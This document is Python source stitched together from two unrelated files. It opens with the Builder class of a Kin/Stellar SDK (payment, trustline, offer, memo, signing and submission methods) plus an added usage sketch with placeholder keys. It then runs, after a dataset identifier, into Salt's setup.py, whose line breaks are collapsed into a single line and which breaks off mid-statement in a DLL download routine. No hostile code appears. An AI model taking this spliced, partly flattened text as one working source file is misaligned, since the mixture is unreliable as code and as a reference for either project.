            "append_trust_op will be deprecated in the future, use append_change_trust_op instead.",
            PendingDeprecationWarning
        )
        return self.append_change_trust_op(asset_code=code,
                                           asset_issuer=destination,
                                           limit=limit,
                                           source=source)

    def append_change_trust_op(self,
                               asset_code: str,
                               asset_issuer: str,
                               limit: Optional[str] = None,
                               source: Optional[str] = None) -> 'Builder':
        """Append a :class:`ChangeTrust <kin_base.operation.ChangeTrust>`
        operation to the list of operations.

        :param asset_issuer: The issuer address for the asset.
        :param asset_code: The asset code for the asset.
        :param limit: The limit of the new trustline.
        :param source: The source address to add the trustline to.
        :return: This builder instance.
        """
        asset = Asset(asset_code, asset_issuer)
        op = operation.ChangeTrust(asset, limit, source)
        return self.append_op(op)

    def append_payment_op(self,
                          destination: str,
                          amount: str,
                          asset_code: Optional[str] = 'KIN',
                          asset_issuer: Optional[str] = None,
                          source: Optional[str] = None) -> 'Builder':
        """Append a :class:`Payment <kin_base.operation.Payment>` operation
        to the list of operations.

        :param destination: Account address that receives the payment.
        :param amount: The amount of the currency to send in the payment.
        :param asset_code: The asset code for the asset to send.
        :param asset_issuer: The address of the issuer of the asset.
        :param source: The source address of the payment.
        :return: This builder instance.
        """
        asset = Asset(code=asset_code, issuer=asset_issuer)
        op = operation.Payment(destination, asset, amount, source)
        return self.append_op(op)

    def append_path_payment_op(self,
                               destination,
                               send_code,
                               send_issuer,
                               send_max,
                               dest_code,
                               dest_issuer,
                               dest_amount,
                               path,
                               source=None):
        """Append a :class:`PathPayment <kin_base.operation.PathPayment>`
        operation to the list of operations.

        :param str destination: The destination address (Account ID) for the payment.
        :param str send_code: The asset code for the source asset deducted from
            the source account.
        :param send_issuer: The address of the issuer of the source asset.
        :type send_issuer: str, None
        :param str send_max: The maximum amount of send asset to deduct (excluding fees).
        :param str dest_code: The asset code for the final destination asset
            sent to the recipient.
        :param dest_issuer: Account address that receives the payment.
        :type dest_issuer: str, None
        :param str dest_amount: The amount of destination asset the destination
            account receives.
        :param list path: A list of asset tuples, each tuple containing a
            (asset_code, asset_issuer) for each asset in the path. For the
            native asset, `None` is used for the asset_issuer.
        :param str source: The source address of the path payment.
        :return: This builder instance.
        """
        # path: a list of asset tuples which contain asset_code and asset_issuer,
        # [(asset_code, asset_issuer), (asset_code, asset_issuer)]; for the native
        # asset you can deliver ('KIN', None)
        send_asset = Asset(send_code, send_issuer)
        dest_asset = Asset(dest_code, dest_issuer)

        assets = []
        for p in path:
            assets.append(Asset(p[0], p[1]))

        op = operation.PathPayment(destination, send_asset, send_max,
                                   dest_asset, dest_amount, assets, source)
        return self.append_op(op)

    def append_allow_trust_op(self, trustor, asset_code, authorize, source=None):
        """Append an :class:`AllowTrust <kin_base.operation.AllowTrust>`
        operation to the list of operations.

        :param str trustor: The account of the recipient of the trustline.
        :param str asset_code: The asset of the trustline the source account
            is authorizing. For example, if an anchor wants to allow another
            account to hold its USD credit, the type is USD:anchor.
        :param bool authorize: Flag indicating whether the trustline is authorized.
        :param str source: The source address that is establishing the trust
            in the allow trust operation.
        :return: This builder instance.
        """
        op = operation.AllowTrust(trustor, asset_code, authorize, source)
        return self.append_op(op)

    def append_set_options_op(self,
                              inflation_dest: Optional[str] = None,
                              clear_flags: Optional[int] = None,
                              set_flags: Optional[int] = None,
                              master_weight: Optional[int] = None,
                              low_threshold: Optional[int] = None,
                              med_threshold: Optional[int] = None,
                              high_threshold: Optional[int] = None,
                              home_domain: Optional[str] = None,
                              signer_address: Optional[str] = None,
                              signer_type: Optional[str] = None,
                              signer_weight: Optional[int] = None,
                              source: Optional[str] = None) -> 'Builder':
        """Append a :class:`SetOptions <kin_base.operation.SetOptions>`
        operation to the list of operations.

        .. _Accounts:
            https://www.stellar.org/developers/guides/concepts/accounts.html

        :param inflation_dest: The address in which to send inflation to on an
            :class:`Inflation <kin_base.operation.Inflation>` operation.
        :param clear_flags: Indicates which flags to clear. For details about
            the flags, please refer to Stellar's documentation on `Accounts`_.
            The bit mask integer subtracts from the existing flags of the
            account. This allows for setting specific bits without knowledge
            of existing flags.
        :param set_flags: Indicates which flags to set. For details about the
            flags, please refer to Stellar's documentation on `Accounts`_. The
            bit mask integer adds onto the existing flags of the account. This
            allows for setting specific bits without knowledge of existing flags.
        :param master_weight: Weight of the master key. This account may also
            add other keys with which to sign transactions using the signer param.
        :param low_threshold: A number from 0-255 representing the threshold
            this account sets on all operations it performs that have a `low
            threshold <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_.
        :param med_threshold: A number from 0-255 representing the threshold
            this account sets on all operations it performs that have a `medium
            threshold <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_.
        :param high_threshold: A number from 0-255 representing the threshold
            this account sets on all operations it performs that have a `high
            threshold <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_.
        :param home_domain: Sets the home domain of an account. See Stellar's
            documentation on `Federation
            <https://www.stellar.org/developers/guides/concepts/federation.html>`_.
        :param signer_address: The address of the new signer to add to the
            source account.
        :param signer_type: The type of signer to add to the account. Must be
            in ('ed25519PublicKey', 'hashX', 'preAuthTx'). See Stellar's
            documentation for `Multi-Sign
            <https://www.stellar.org/developers/guides/concepts/multi-sig.html>`_
            for more information.
        :param signer_weight: The weight of the signer. If the weight is 0,
            the signer will be deleted.
        :param source: The source address for which options are being set.
        :return: This builder instance.
        """
        op = operation.SetOptions(inflation_dest, clear_flags, set_flags,
                                  master_weight, low_threshold, med_threshold,
                                  high_threshold, home_domain, signer_address,
                                  signer_type, signer_weight, source)
        return self.append_op(op)

    def append_hashx_signer(self, hashx, signer_weight, source=None):
        """Add a HashX signer to an account.

        Add a HashX signer to an account via a :class:`SetOptions
        <kin_base.operation.SetOptions>` operation. This is a helper function
        for :meth:`append_set_options_op`.

        :param hashx: The address of the new hashX signer.
        :type hashx: str, bytes
        :param int signer_weight: The weight of the new signer.
        :param str source: The source account that is adding a signer to its
            list of signers.
        :return: This builder instance.
        """
        return self.append_set_options_op(
            signer_address=hashx,
            signer_type='hashX',
            signer_weight=signer_weight,
            source=source)

    def append_pre_auth_tx_signer(self, pre_auth_tx, signer_weight, source=None):
        """Add a PreAuthTx signer to an account.

        Add a PreAuthTx signer to an account via a :class:`SetOptions
        <kin_base.operation.SetOptions>` operation. This is a helper function
        for :meth:`append_set_options_op`.

        :param pre_auth_tx: The address of the new preAuthTx signer - obtained
            by calling `hash_meta` on the TransactionEnvelope.
        :type pre_auth_tx: str, bytes
        :param int signer_weight: The weight of the new signer.
        :param str source: The source account that is adding a signer to its
            list of signers.
        :return: This builder instance.
        """
        return self.append_set_options_op(
            signer_address=pre_auth_tx,
            signer_type='preAuthTx',
            signer_weight=signer_weight,
            source=source)

    def append_manage_offer_op(self,
                               selling_code,
                               selling_issuer,
                               buying_code,
                               buying_issuer,
                               amount,
                               price,
                               offer_id=0,
                               source=None):
        """Append a :class:`ManageOffer <kin_base.operation.ManageOffer>`
        operation to the list of operations.

        :param str selling_code: The asset code for the asset the offer creator
            is selling.
        :param selling_issuer: The issuing address for the asset the offer
            creator is selling.
        :type selling_issuer: str, None
        :param str buying_code: The asset code for the asset the offer creator
            is buying.
        :param buying_issuer: The issuing address for the asset the offer
            creator is buying.
        :type buying_issuer: str, None
        :param str amount: Amount of the asset being sold. Set to 0 if you want
            to delete an existing offer.
        :param price: Price of 1 unit of selling in terms of buying. You can
            pass in a number as a string or a dict like
            `{n: numerator, d: denominator}`.
        :type price: str, dict
        :param int offer_id: The ID of the offer. 0 for new offer. Set to an
            existing offer ID to update or delete.
        :param str source: The source address that is managing an offer on
            Stellar's distributed exchange.
        :return: This builder instance.
        """
        selling = Asset(selling_code, selling_issuer)
        buying = Asset(buying_code, buying_issuer)
        op = operation.ManageOffer(selling, buying, amount, price, offer_id, source)
        return self.append_op(op)

    def append_create_passive_offer_op(self,
                                       selling_code,
                                       selling_issuer,
                                       buying_code,
                                       buying_issuer,
                                       amount,
                                       price,
                                       source=None):
        """Append a :class:`CreatePassiveOffer
        <kin_base.operation.CreatePassiveOffer>` operation to the list of
        operations.

        :param str selling_code: The asset code for the asset the offer creator
            is selling.
        :param selling_issuer: The issuing address for the asset the offer
            creator is selling.
        :type selling_issuer: str, None
        :param str buying_code: The asset code for the asset the offer creator
            is buying.
        :param buying_issuer: The issuing address for the asset the offer
            creator is buying.
        :type buying_issuer: str, None
        :param str amount: Amount of the asset being sold. Set to 0 if you want
            to delete an existing offer.
        :param price: Price of 1 unit of selling in terms of buying. You can
            pass in a number as a string or a dict like
            `{n: numerator, d: denominator}`.
        :type price: str, dict
        :param str source: The source address that is creating a passive offer
            on Stellar's distributed exchange.
        :return: This builder instance.
        """
        selling = Asset(selling_code, selling_issuer)
        buying = Asset(buying_code, buying_issuer)
        op = operation.CreatePassiveOffer(selling, buying, amount, price, source)
        return self.append_op(op)

    def append_account_merge_op(self, destination, source=None):
        """Append a :class:`AccountMerge <kin_base.operation.AccountMerge>`
        operation to the list of operations.

        :param str destination: The account address that the source account's
            remaining balance is merged into.
        :param str source: The source address that is being merged into the
            destination account.
        :return: This builder instance.
        """
        op = operation.AccountMerge(destination, source)
        return self.append_op(op)

    def append_inflation_op(self, source=None):
        """Append an :class:`Inflation <kin_base.operation.Inflation>`
        operation to the list of operations.

        :param str source: The source address that is running the inflation
            operation.
        :return: This builder instance.
        """
        op = operation.Inflation(source)
        return self.append_op(op)

    def append_manage_data_op(self,
                              data_name: str,
                              data_value: Union[str, bytes, None],
                              source: Optional[str] = None) -> 'Builder':
        """Append a :class:`ManageData <kin_base.operation.ManageData>`
        operation to the list of operations.

        :param data_name: String up to 64 bytes long. If this is a new Name
            it will add the given name/value pair to the account. If this Name
            is already present then the associated value will be modified.
        :param data_value: If not present then the existing Name will be
            deleted. If present then this value will be set in the DataEntry.
            Up to 64 bytes long.
        :param source: The source account on which data is being managed.
        :return: This builder instance.
        """
        op = operation.ManageData(data_name, data_value, source)
        return self.append_op(op)

    def append_bump_sequence_op(self, bump_to, source=None):
        """Append a :class:`BumpSequence <kin_base.operation.BumpSequence>`
        operation to the list of operations.

        Only available in protocol version 10 and above.

        :param int bump_to: Sequence number to bump to.
        :param str source: The source address that is running the bump
            sequence operation.
        :return: This builder instance.
        """
        op = operation.BumpSequence(bump_to, source)
        return self.append_op(op)

    def add_memo(self, memo):
        """Set the memo for the transaction built by this :class:`Builder`.

        :param memo: A memo to add to this transaction.
        :type memo: :class:`Memo <kin_base.memo.Memo>`
        :return: This builder instance.
        """
        self.memo = memo
        return self

    def add_text_memo(self, memo_text: str):
        """Set the memo for the transaction to a new
        :class:`TextMemo <kin_base.memo.TextMemo>`.

        :param memo_text: The text for the memo to add.
        :return: This builder instance.
        """
        memo_text = memo.TextMemo(memo_text)
        return self.add_memo(memo_text)

    def add_id_memo(self, memo_id):
        """Set the memo for the transaction to a new
        :class:`IdMemo <kin_base.memo.IdMemo>`.

        :param int memo_id: A 64 bit unsigned integer to set as the memo.
        :return: This builder instance.
        """
        memo_id = memo.IdMemo(memo_id)
        return self.add_memo(memo_id)

    def add_hash_memo(self, memo_hash):
        """Set the memo for the transaction to a new
        :class:`HashMemo <kin_base.memo.HashMemo>`.

        :param memo_hash: A 32 byte hash or hex encoded string to use as the memo.
        :type memo_hash: bytes, str
        :return: This builder instance.
        """
        memo_hash = memo.HashMemo(memo_hash)
        return self.add_memo(memo_hash)

    def add_ret_hash_memo(self, memo_return):
        """Set the memo for the transaction to a new
        :class:`RetHashMemo <kin_base.memo.RetHashMemo>`.

        :param memo_return: A 32 byte hash or hex encoded string intended to be
            interpreted as the hash of the transaction the sender is refunding.
        :type memo_return: bytes, str
        :return: This builder instance.
        """
        memo_return = memo.RetHashMemo(memo_return)
        return self.add_memo(memo_return)

    def add_time_bounds(self, time_bounds):
        """Add a time bound to this transaction.

        Add a UNIX timestamp, determined by ledger time, of a lower and upper
        bound of when this transaction will be valid. If a transaction is
        submitted too early or too late, it will fail to make it into the
        transaction set. A maxTime equal to 0 means it is not set.

        :param dict time_bounds: A dict that contains a minTime and maxTime
            attribute (`{'minTime': 1534392138, 'maxTime': 1534392238}`)
            representing the lower and upper bound of when a given transaction
            will be valid.
        :return: This builder instance.
        """
        self.time_bounds = time_bounds
        return self

    def gen_tx(self):
        """Generate a :class:`Transaction <kin_base.transaction.Transaction>`
        object from the list of operations contained within this object.

        :return: A transaction representing all of the operations that have
            been appended to this builder.
        :rtype: :class:`Transaction <kin_base.transaction.Transaction>`
        """
        if not self.sequence:
            raise SequenceError('No sequence is present, maybe not funded?')

        tx = Transaction(
            source=self.address,
            sequence=self.sequence,
            time_bounds=self.time_bounds,
            memo=self.memo,
            fee=self.fee * len(self.ops),
            operations=self.ops)
        self.tx = tx
        return tx

    def gen_te(self):
        """Generate a :class:`TransactionEnvelope
        <kin_base.transaction_envelope.TransactionEnvelope>` around the
        generated Transaction via the list of operations in this instance.

        :return: A transaction envelope ready to send over the network.
        :rtype: :class:`TransactionEnvelope
            <kin_base.transaction_envelope.TransactionEnvelope>`
        """
        if self.tx is None:
            self.gen_tx()
        te = Te(self.tx, network_id=self.network_name)
        if self.te:
            te.signatures = self.te.signatures
        self.te = te
        return te

    def gen_xdr(self):
        """Create an XDR object around a newly generated
        :class:`TransactionEnvelope
        <kin_base.transaction_envelope.TransactionEnvelope>`.

        :return: An XDR object representing a newly created transaction
            envelope ready to send over the network.
        """
        if self.tx is None:
            self.gen_te()
        return self.te.xdr()

    def gen_compliance_xdr(self):
        """Create an XDR object representing this builder's transaction to be
        sent over via the Compliance protocol (notably, with a sequence number
        of 0).

        Intentionally, the XDR object is returned without any signatures on
        the transaction.

        See `Stellar's documentation on its Compliance Protocol
        <https://www.stellar.org/developers/guides/compliance-protocol.html>`_
        for more information.
        """
        sequence = self.sequence
        self.sequence = 0
        tx_xdr = self.gen_tx().xdr()
        self.sequence = sequence
        return tx_xdr

    def hash(self):
        """Return a hash for this transaction.

        :return: A hash for this transaction.
        :rtype: bytes
        """
        return self.gen_te().hash_meta()

    def hash_hex(self) -> str:
        """Return a hex encoded hash for this transaction.

        :return: A hex encoded hash for this transaction.
        :rtype: str
        """
        return binascii.hexlify(self.hash()).decode()

    def import_from_xdr(self, xdr: Union[str, bytes]) -> 'Builder':
        """Create a :class:`TransactionEnvelope
        <kin_base.transaction_envelope.TransactionEnvelope>` via an XDR object.

        In addition, sets the fields of this builder (the transaction envelope,
        transaction, operations, source, etc.) to all of the fields in the
        provided XDR transaction envelope.

        :param xdr: The XDR object representing the transaction envelope to
            which this builder is setting its state to.
        """
        te = Te.from_xdr(xdr)
        if self.network_name.upper() in NETWORKS:
            te.network_id = Network(NETWORKS[self.network_name]).network_id()
        else:
            te.network_id = Network(self.network_name).network_id()
        self.te = te
        self.tx = te.tx  # with a different source or not
        self.ops = te.tx.operations
        self.address = te.tx.source
        self.sequence = te.tx.sequence
        time_bounds_in_xdr = te.tx.time_bounds
        if time_bounds_in_xdr:
            self.time_bounds = {
                'maxTime': time_bounds_in_xdr[0].maxTime,
                'minTime': time_bounds_in_xdr[0].minTime
            }
        else:
            self.time_bounds = None
        self.memo = te.tx.memo
        return self

    def sign(self, secret: Optional[str] = None) -> None:
        """Sign the generated :class:`TransactionEnvelope
        <kin_base.transaction_envelope.TransactionEnvelope>` from the list of
        this builder's operations.

        :param secret: The secret seed to use if a key pair or secret was not
            provided when this class was originally instantiated, or if another
            key is being utilized to sign the transaction envelope.
        """
        keypair = self.keypair if not secret else Keypair.from_seed(secret)
        self.gen_te()
        self.te.sign(keypair)

    def sign_preimage(self, preimage):
        """Sign the generated transaction envelope using a Hash(x) signature.

        :param preimage: The value to be hashed and used as a signer on the
            transaction envelope.
        :type preimage: str, bytes
        """
        if self.te is None:
            self.gen_te()
        self.te.sign_hashX(preimage)

    async def submit(self) -> dict:
        """Submit the generated XDR object of the built transaction envelope
        to Horizon.

        Sends the generated transaction envelope over the wire via this
        builder's :class:`Horizon <kin_base.horizon.Horizon>` instance. Note
        that you'll typically want to sign the transaction before submitting
        via the sign methods.

        :returns: A dict representing the JSON response from Horizon.
        """
        return await self.horizon.submit(self.gen_xdr().decode())

    def next_builder(self):
        """Create a new builder based off of this one with its sequence number
        incremented.

        :return: A new Builder instance
        :rtype: :class:`Builder`
        """
        next_builder = Builder(horizon=self.horizon,
                               network_name=self.network_name,
                               fee=self.fee,
                               secret=self.keypair.seed().decode(),
                               sequence=self.sequence + 1)

        return next_builder

    async def update_sequence(self) -> None:
        """
        Update the builder with the next sequence of the account
        """
        address = await self.horizon.account(self.address)
        self.sequence = int(address.get('sequence')) + 1

    async def set_channel(self, channel_seed: str) -> None:
        """
        Set a channel to be used for this transaction

        # TODO: get keypair instead of seed, no need for crypto operation if not needed
        :param channel_seed: Seed to use as the channel
        """
        self.keypair = Keypair.from_seed(channel_seed)
        self.address = self.keypair.address().decode()
        await self.update_sequence()
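
# ---------------------------------------------------------------------------
# Editor's usage sketch (not part of the original module).  It strings the
# Builder methods defined above into a minimal payment flow.  The Horizon
# endpoint URL, the sender seed and the destination address are placeholders,
# and Horizon is assumed to accept the server URI as its first constructor
# argument; adjust these to your environment before running.
if __name__ == '__main__':
    import asyncio

    async def _example_payment():
        horizon = Horizon('https://horizon-testnet.kininfrastructure.com')  # placeholder endpoint
        builder = Builder(horizon=horizon,
                          network_name='TESTNET',
                          fee=100,
                          secret='S...SENDER_SECRET_SEED...')  # placeholder seed
        await builder.update_sequence()          # fetch the account's current sequence + 1
        builder.append_payment_op(destination='G...DESTINATION_ADDRESS...',  # placeholder address
                                  amount='10')
        builder.add_text_memo('example payment')
        builder.sign()                           # sign with the builder's own keypair
        response = await builder.submit()        # POST the signed XDR to Horizon
        print(response)

    asyncio.get_event_loop().run_until_complete(_example_payment())
# ---------------------------------------------------------------------------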
the-stack_106_24315
#!/usr/bin/env python """ The setup script for salt """ # pylint: disable=file-perms,resource-leakage import contextlib import distutils.dist import glob import operator import os import platform import sys from ctypes.util import find_library from datetime import datetime # pylint: disable=no-name-in-module from distutils import log from distutils.cmd import Command from distutils.command.build import build from distutils.command.clean import clean from distutils.command.install_lib import install_lib from distutils.errors import DistutilsArgError from distutils.version import LooseVersion # pylint: disable=blacklisted-module import setuptools from setuptools import setup from setuptools.command.bdist_egg import bdist_egg from setuptools.command.develop import develop from setuptools.command.install import install from setuptools.command.sdist import sdist # pylint: enable=no-name-in-module try: from urllib2 import urlopen except ImportError: from urllib.request import urlopen # pylint: disable=no-name-in-module try: from wheel.bdist_wheel import bdist_wheel HAS_BDIST_WHEEL = True except ImportError: HAS_BDIST_WHEEL = False try: import zmq HAS_ZMQ = True except ImportError: HAS_ZMQ = False try: DATE = datetime.utcfromtimestamp(int(os.environ["SOURCE_DATE_EPOCH"])) except (KeyError, ValueError): DATE = datetime.utcnow() # Change to salt source's directory prior to running any command try: SETUP_DIRNAME = os.path.dirname(__file__) except NameError: # We're most likely being frozen and __file__ triggered this NameError # Let's work around that SETUP_DIRNAME = os.path.dirname(sys.argv[0]) if SETUP_DIRNAME != "": os.chdir(SETUP_DIRNAME) SETUP_DIRNAME = os.path.abspath(SETUP_DIRNAME) BOOTSTRAP_SCRIPT_DISTRIBUTED_VERSION = os.environ.get( # The user can provide a different bootstrap-script version. # ATTENTION: A tag for that version MUST exist "BOOTSTRAP_SCRIPT_VERSION", # If no bootstrap-script version was provided from the environment, let's # provide the one we define. "v2014.06.21", ) # Store a reference to the executing platform IS_OSX_PLATFORM = sys.platform.startswith("darwin") IS_WINDOWS_PLATFORM = sys.platform.startswith("win") if IS_WINDOWS_PLATFORM or IS_OSX_PLATFORM: IS_SMARTOS_PLATFORM = False else: # os.uname() not available on Windows. 
IS_SMARTOS_PLATFORM = os.uname()[0] == "SunOS" and os.uname()[3].startswith( "joyent_" ) USE_STATIC_REQUIREMENTS = os.environ.get("USE_STATIC_REQUIREMENTS") if USE_STATIC_REQUIREMENTS is not None: USE_STATIC_REQUIREMENTS = USE_STATIC_REQUIREMENTS == "1" try: # Add the esky bdist target if the module is available # may require additional modules depending on platform # bbfreeze chosen for its tight integration with distutils import bbfreeze # pylint: disable=unused-import from esky import bdist_esky # pylint: disable=unused-import HAS_ESKY = True except ImportError: HAS_ESKY = False SALT_VERSION = os.path.join(os.path.abspath(SETUP_DIRNAME), "salt", "version.py") SALT_VERSION_HARDCODED = os.path.join( os.path.abspath(SETUP_DIRNAME), "salt", "_version.py" ) SALT_SYSPATHS_HARDCODED = os.path.join( os.path.abspath(SETUP_DIRNAME), "salt", "_syspaths.py" ) SALT_BASE_REQUIREMENTS = [ os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "base.txt"), # pyzmq needs to be installed regardless of the salt transport os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "zeromq.txt"), os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "crypto.txt"), ] SALT_LINUX_LOCKED_REQS = [ # Linux packages defined locked requirements os.path.join( os.path.abspath(SETUP_DIRNAME), "requirements", "static", "pkg", "py{}.{}".format(*sys.version_info), "linux.txt", ) ] SALT_OSX_REQS = SALT_BASE_REQUIREMENTS + [ os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "darwin.txt") ] SALT_OSX_LOCKED_REQS = [ # OSX packages already defined locked requirements os.path.join( os.path.abspath(SETUP_DIRNAME), "requirements", "static", "pkg", "py{}.{}".format(*sys.version_info), "darwin.txt", ) ] SALT_WINDOWS_REQS = SALT_BASE_REQUIREMENTS + [ os.path.join(os.path.abspath(SETUP_DIRNAME), "requirements", "windows.txt") ] SALT_WINDOWS_LOCKED_REQS = [ # Windows packages already defined locked requirements os.path.join( os.path.abspath(SETUP_DIRNAME), "requirements", "static", "pkg", "py{}.{}".format(*sys.version_info), "windows.txt", ) ] SALT_LONG_DESCRIPTION_FILE = os.path.join(os.path.abspath(SETUP_DIRNAME), "README.rst") # Salt SSH Packaging Detection PACKAGED_FOR_SALT_SSH_FILE = os.path.join( os.path.abspath(SETUP_DIRNAME), ".salt-ssh-package" ) PACKAGED_FOR_SALT_SSH = os.path.isfile(PACKAGED_FOR_SALT_SSH_FILE) # pylint: disable=W0122 exec(compile(open(SALT_VERSION).read(), SALT_VERSION, "exec")) # pylint: enable=W0122 # ----- Helper Functions --------------------------------------------------------------------------------------------> def _parse_op(op): """ >>> _parse_op('>') 'gt' >>> _parse_op('>=') 'ge' >>> _parse_op('=>') 'ge' >>> _parse_op('=> ') 'ge' >>> _parse_op('<') 'lt' >>> _parse_op('<=') 'le' >>> _parse_op('==') 'eq' >>> _parse_op(' <= ') 'le' """ op = op.strip() if ">" in op: if "=" in op: return "ge" else: return "gt" elif "<" in op: if "=" in op: return "le" else: return "lt" elif "!" 
in op: return "ne" else: return "eq" def _parse_ver(ver): """ >>> _parse_ver("'3.4' # pyzmq 17.1.0 stopped building wheels for python3.4") '3.4' >>> _parse_ver('"3.4"') '3.4' >>> _parse_ver('"2.6.17"') '2.6.17' """ if "#" in ver: ver, _ = ver.split("#", 1) ver = ver.strip() return ver.strip("'").strip('"') def _check_ver(pyver, op, wanted): """ >>> _check_ver('2.7.15', 'gt', '2.7') True >>> _check_ver('2.7.15', 'gt', '2.7.15') False >>> _check_ver('2.7.15', 'ge', '2.7.15') True >>> _check_ver('2.7.15', 'eq', '2.7.15') True """ pyver = distutils.version.LooseVersion(pyver) wanted = distutils.version.LooseVersion(wanted) if not isinstance(pyver, str): pyver = str(pyver) if not isinstance(wanted, str): wanted = str(wanted) return getattr(operator, "__{}__".format(op))(pyver, wanted) def _parse_requirements_file(requirements_file): parsed_requirements = [] with open(requirements_file) as rfh: for line in rfh.readlines(): line = line.strip() if not line or line.startswith(("#", "-r", "--")): continue if IS_WINDOWS_PLATFORM: if "libcloud" in line: continue try: pkg, pyverspec = line.rsplit(";", 1) except ValueError: pkg, pyverspec = line, "" pyverspec = pyverspec.strip() if pyverspec and ( not pkg.startswith("pycrypto") or pkg.startswith("pycryptodome") ): _, op, ver = pyverspec.split(" ", 2) if not _check_ver( platform.python_version(), _parse_op(op), _parse_ver(ver) ): continue parsed_requirements.append(pkg) return parsed_requirements # <---- Helper Functions --------------------------------------------------------------------------------------------- # ----- Custom Distutils/Setuptools Commands ------------------------------------------------------------------------> class WriteSaltVersion(Command): description = "Write salt's hardcoded version file" user_options = [] def initialize_options(self): """ Abstract method that is required to be overwritten """ def finalize_options(self): """ Abstract method that is required to be overwritten """ def run(self): if ( not os.path.exists(SALT_VERSION_HARDCODED) or self.distribution.with_salt_version ): # Write the version file if getattr(self.distribution, "salt_version_hardcoded_path", None) is None: self.distribution.salt_version_hardcoded_path = SALT_VERSION_HARDCODED sys.stderr.write("This command is not meant to be called on it's own\n") sys.stderr.flush() if not self.distribution.with_salt_version: salt_version = ( __saltstack_version__ # pylint: disable=undefined-variable ) else: from salt.version import SaltStackVersion salt_version = SaltStackVersion.parse( self.distribution.with_salt_version ) # pylint: disable=E0602 open(self.distribution.salt_version_hardcoded_path, "w").write( INSTALL_VERSION_TEMPLATE.format( date=DATE, full_version_info=salt_version.full_info_all_versions ) ) # pylint: enable=E0602 class GenerateSaltSyspaths(Command): description = "Generate salt's hardcoded syspaths file" def initialize_options(self): pass def finalize_options(self): pass def run(self): # Write the syspaths file if getattr(self.distribution, "salt_syspaths_hardcoded_path", None) is None: print("This command is not meant to be called on it's own") exit(1) # Write the system paths file open(self.distribution.salt_syspaths_hardcoded_path, "w").write( INSTALL_SYSPATHS_TEMPLATE.format( date=DATE, root_dir=self.distribution.salt_root_dir, share_dir=self.distribution.salt_share_dir, config_dir=self.distribution.salt_config_dir, cache_dir=self.distribution.salt_cache_dir, sock_dir=self.distribution.salt_sock_dir, 
srv_root_dir=self.distribution.salt_srv_root_dir, base_file_roots_dir=self.distribution.salt_base_file_roots_dir, base_pillar_roots_dir=self.distribution.salt_base_pillar_roots_dir, base_master_roots_dir=self.distribution.salt_base_master_roots_dir, base_thorium_roots_dir=self.distribution.salt_base_thorium_roots_dir, logs_dir=self.distribution.salt_logs_dir, pidfile_dir=self.distribution.salt_pidfile_dir, spm_parent_path=self.distribution.salt_spm_parent_dir, spm_formula_path=self.distribution.salt_spm_formula_dir, spm_pillar_path=self.distribution.salt_spm_pillar_dir, spm_reactor_path=self.distribution.salt_spm_reactor_dir, home_dir=self.distribution.salt_home_dir, ) ) class WriteSaltSshPackagingFile(Command): description = "Write salt's ssh packaging file" user_options = [] def initialize_options(self): """ Abstract method that is required to be overwritten """ def finalize_options(self): """ Abstract method that is required to be overwritten """ def run(self): if not os.path.exists(PACKAGED_FOR_SALT_SSH_FILE): # Write the salt-ssh packaging file if getattr(self.distribution, "salt_ssh_packaging_file", None) is None: print("This command is not meant to be called on it's own") exit(1) # pylint: disable=E0602 open(self.distribution.salt_ssh_packaging_file, "w").write( "Packaged for Salt-SSH\n" ) # pylint: enable=E0602 class Develop(develop): user_options = develop.user_options + [ ( "write-salt-version", None, "Generate Salt's _version.py file which allows proper version " "reporting. This defaults to False on develop/editable setups. " "If WRITE_SALT_VERSION is found in the environment this flag is " "switched to True.", ), ( "generate-salt-syspaths", None, "Generate Salt's _syspaths.py file which allows tweaking some " "common paths that salt uses. This defaults to False on " "develop/editable setups. If GENERATE_SALT_SYSPATHS is found in " "the environment this flag is switched to True.", ), ( "mimic-salt-install", None, "Mimmic the install command when running the develop command. " "This will generate salt's _version.py and _syspaths.py files. " "Generate Salt's _syspaths.py file which allows tweaking some " "This defaults to False on develop/editable setups. 
" "If MIMIC_INSTALL is found in the environment this flag is " "switched to True.", ), ] boolean_options = develop.boolean_options + [ "write-salt-version", "generate-salt-syspaths", "mimic-salt-install", ] def initialize_options(self): develop.initialize_options(self) self.write_salt_version = False self.generate_salt_syspaths = False self.mimic_salt_install = False def finalize_options(self): develop.finalize_options(self) if "WRITE_SALT_VERSION" in os.environ: self.write_salt_version = True if "GENERATE_SALT_SYSPATHS" in os.environ: self.generate_salt_syspaths = True if "MIMIC_SALT_INSTALL" in os.environ: self.mimic_salt_install = True if self.mimic_salt_install: self.write_salt_version = True self.generate_salt_syspaths = True def run(self): if IS_WINDOWS_PLATFORM: # Download the required DLLs self.distribution.salt_download_windows_dlls = True self.run_command("download-windows-dlls") self.distribution.salt_download_windows_dlls = None if self.write_salt_version is True: self.distribution.running_salt_install = True self.distribution.salt_version_hardcoded_path = SALT_VERSION_HARDCODED self.run_command("write_salt_version") if self.generate_salt_syspaths: self.distribution.salt_syspaths_hardcoded_path = SALT_SYSPATHS_HARDCODED self.run_command("generate_salt_syspaths") # Resume normal execution develop.run(self) class DownloadWindowsDlls(Command): description = "Download required DLL's for windows" def initialize_options(self): pass def finalize_options(self): pass def run(self): if getattr(self.distribution, "salt_download_windows_dlls", None) is None: print("This command is not meant to be called on it's own") exit(1) try: import pip # pip has moved many things to `_internal` starting with pip 10 if LooseVersion(pip.__version__) < LooseVersion("10.0"): # pylint: disable=no-name-in-module from pip.utils.logging import indent_log # pylint: enable=no-name-in-module else: from pip._internal.utils.logging import ( # pylint: disable=no-name-in-module indent_log, ) except ImportError: # TODO: Impliment indent_log here so we don't require pip @contextlib.contextmanager def indent_log(): yield platform_bits, _ = platform.architecture() url = "https://repo.saltstack.com/windows/dependencies/{bits}/{fname}.dll" dest = os.path.join(os.path.dirname(sys.executable), "{fname}.dll") with indent_log(): for fname in ("libeay32", "ssleay32", "libsodium"): # See if the library is already on the system if find_library(fname): continue furl = url.format(bits=platform_bits[:2], fname=fname) fdest = dest.format(fname=fname) if not os.path.exists(fdest): log.info( "Downloading {}.dll to {} from {}".format(fname, fdest, furl) ) try: from contextlib import closing import requests with closing(requests.get(furl, stream=True)) as req: if req.status_code == 200: with open(fdest, "wb") as wfh: for chunk in req.iter_content(chunk_size=4096): if chunk: # filter out keep-alive new 